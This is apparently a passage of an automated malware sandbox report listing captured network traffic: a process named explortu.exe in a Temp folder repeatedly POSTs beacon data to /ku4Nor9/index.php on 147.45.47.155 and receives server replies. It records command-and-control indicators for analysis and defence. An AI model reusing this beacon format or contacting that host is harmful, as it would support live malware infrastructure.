                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:50.817111015 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.649776147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:50.925843000 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:51.601258039 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:51.602471113 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:51.810671091 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.649777147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:51.927491903 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:52.594244957 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:52.595016956 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:52.840578079 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.649778147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:52.956867933 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:53.623290062 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:53.624404907 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:53.832168102 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.649779147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:53.941473961 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:54.612310886 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:54.613142967 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:54.821027040 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.649780147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:54.941982985 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:55.617217064 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:55.618096113 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:55.826967955 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.649781147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:55.944453955 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:56.613027096 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:56.613981962 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:56.821885109 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.649782147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:56.943121910 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:57.606743097 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:57.607610941 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:57.814579010 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.649783147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:57.925823927 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:58.592544079 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:58.594749928 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:58.802709103 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.649784147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:58.925432920 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:59.601511002 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:59.602433920 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:59.811300993 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.649785147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:59.925549984 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 06:00:00.637893915 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 06:00:00.638804913 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 06:00:00.847273111 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.649786147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 06:00:00.958560944 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 06:00:01.664920092 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 06:00:01.665698051 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 06:00:01.884692907 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 04:00:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.649787147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 06:00:02.004724979 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
